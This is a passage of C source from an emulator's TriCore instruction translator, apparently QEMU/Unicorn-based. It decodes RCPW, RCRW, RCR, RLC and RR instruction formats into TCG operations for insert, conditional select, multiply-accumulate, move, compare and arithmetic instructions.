tcg_ctx->cpu_gpr_d[r2+1], ((1u << width) - 1) << pos); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], (const4 << pos)); } break; case OPC2_32_RCPW_INSERT: /* if pos + width > 32 undefined result */ if (pos + width <= 32) { temp = tcg_const_i32(tcg_ctx, const4); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, pos, width); tcg_temp_free(tcg_ctx, temp); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RCRW format */ static void decode_rcrw_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t width, const4; TCGv temp, temp2, temp3; op2 = MASK_OP_RCRW_OP2(ctx->opcode); r1 = MASK_OP_RCRW_S1(ctx->opcode); r3 = MASK_OP_RCRW_S3(ctx->opcode); r4 = MASK_OP_RCRW_D(ctx->opcode); width = MASK_OP_RCRW_WIDTH(ctx->opcode); const4 = MASK_OP_RCRW_CONST4(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RCRW_IMASK: tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r4], 0x1f); tcg_gen_movi_tl(tcg_ctx, temp2, (1 << width) - 1); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp2, temp); tcg_gen_movi_tl(tcg_ctx, temp2, const4); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], temp2, temp); break; case OPC2_32_RCRW_INSERT: temp3 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, width); tcg_gen_movi_tl(tcg_ctx, temp2, const4); tcg_gen_andi_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r4], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp2, temp, temp3); tcg_temp_free(tcg_ctx, temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* RCR format */ static void decode_rcr_cond_select(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; TCGv temp, temp2; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_CADD: gen_condi_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], const9, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RCR_CADDN: gen_condi_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], const9, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RCR_SEL: temp = tcg_const_i32(tcg_ctx, 0); temp2 = tcg_const_i32(tcg_ctx, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RCR_SELN: temp = tcg_const_i32(tcg_ctx, 0); temp2 = tcg_const_i32(tcg_ctx, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rcr_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_MADD_32: gen_maddi32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADD_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddi64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADDS_32: gen_maddsi_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADDS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsi_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADD_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddui64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADDS_U_32: const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddsui_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADDS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddsui_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rcr_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_MSUB_32: gen_msubi32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUB_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubi64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUBS_32: gen_msubsi_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUBS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubsi_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUB_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubui64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUBS_U_32: const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubsui_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUBS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubsui_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RLC format */ static void decode_rlc_opc(DisasContext *ctx, uint32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t const16; int r1, r2; const16 = MASK_OP_RLC_CONST16_SEXT(ctx->opcode); r1 = MASK_OP_RLC_S1(ctx->opcode); r2 = MASK_OP_RLC_D(ctx->opcode); switch (op1) { case OPC1_32_RLC_ADDI: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const16); break; case OPC1_32_RLC_ADDIH: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const16 << 16); break; case OPC1_32_RLC_ADDIH_A: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r1], const16 << 16); break; case OPC1_32_RLC_MFCR: const16 = MASK_OP_RLC_CONST16(ctx->opcode); gen_mfcr(ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { CHECK_REG_PAIR(r2); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2+1], const16 >> 15); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_RLC_MOV_U: const16 = MASK_OP_RLC_CONST16(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV_H: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16 << 16); break; case OPC1_32_RLC_MOVH_A: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], const16 << 16); break; case OPC1_32_RLC_MTCR: const16 = MASK_OP_RLC_CONST16(ctx->opcode); gen_mtcr(ctx, tcg_ctx->cpu_gpr_d[r1], const16); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RR format */ static void decode_rr_accumulator(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r3, r2, r1; TCGv temp; r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); op2 = MASK_OP_RR_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR_ABS: gen_abs(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABS_B: gen_helper_abs_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABS_H: gen_helper_abs_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF: gen_absdif(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF_B: gen_helper_absdif_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF_H: gen_helper_absdif_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIFS: gen_helper_absdif_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIFS_H: gen_helper_absdif_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSS: gen_helper_abs_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSS_H: gen_helper_abs_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD_B: gen_helper_add_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD_H: gen_helper_add_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDC: gen_addc_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS: gen_adds(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_H: gen_helper_add_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_HU: gen_helper_add_h_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_U: gen_helper_add_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDX: gen_add_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_AND_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_EQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_B: gen_helper_eq_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_H: gen_helper_eq_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_W: gen_cond_w(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQANY_B: gen_helper_eqany_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQANY_H: gen_helper_eqany_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_GE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_GE_U: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_U: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_B: gen_helper_lt_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_BU: gen_helper_lt_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_H: gen_helper_lt_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_HU: gen_helper_lt_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_W: gen_cond_w(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_WU: gen_cond_w(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_U: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_B: gen_helper_max_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_BU: gen_helper_max_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_H: gen_helper_max_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_HU: gen_helper_max_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_U: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_B: gen_helper_min_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_BU: gen_helper_min_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_H: gen_helper_min_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_HU: gen_helper_min_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { temp = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp); tcg_temp_free(tcg_ctx, temp); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_MOVS_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { CHECK_REG_PAIR(r3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], tcg_ctx->cpu_gpr_d[r2], 31); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_NE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_OR_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_SAT_B: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0x7f, -0x80); break; case OPC2_32_RR_SAT_BU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0xff); break; case OPC2_32_RR_SAT_H: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0x7fff, -0x8000); break; case OPC2_32_RR_SAT_HU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0xffff); break; case OPC2_32_RR_SH_EQ: gen_sh_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_GE: gen_sh_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_GE_U: gen_sh_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_LT: gen_sh_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_LT_U: gen_sh_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_NE: gen_sh_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB_B: gen_helper_sub_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB_H: gen_helper_sub_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBC: gen_subc_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS: gen_subs(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_U: gen_subsu(ctx, tcg_ctx->cpu_gpr_d[r3], 